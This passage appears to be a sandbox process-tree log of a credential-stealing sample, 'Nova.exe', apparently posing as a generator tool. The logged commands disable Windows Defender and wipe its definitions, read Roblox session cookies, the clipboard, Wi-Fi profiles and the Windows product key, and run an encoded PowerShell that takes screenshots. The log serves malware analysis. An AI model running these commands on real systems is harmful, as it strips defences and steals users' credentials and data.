"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:1
2⤵
PID:2708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:1
2⤵
PID:5504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3536 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:1
2⤵
PID:1040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:2656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4472 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:2992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:4312

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5804

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Info.txt
1⤵
PID:5396

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:2940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'"
3⤵
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:3220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4696

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1328

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:3848

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:6112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4676

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2816

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:5724

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:4664

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3744

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mw23rkrj\mw23rkrj.cmdline"
5⤵
PID:5952

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC9E.tmp" "c:\Users\Admin\AppData\Local\Temp\mw23rkrj\CSC78E8596833404472B3D04961BBF4D760.TMP"
6⤵
PID:5264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3952

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3964

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1296

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4124

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2008

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3208"
3⤵
PID:4932

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3208
4⤵
- Kills process with taskkill
PID:3172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:3380

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:6056

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:4948

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:5240

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:1400

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5908

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:4464

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:1428

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:4312

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'"
3⤵
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:5152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5316

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:124

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:3464

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:3528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:2068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2644

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5040

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:6064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:4388

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:1444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:2404

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:884

C:\Windows\system32\cmd.exe
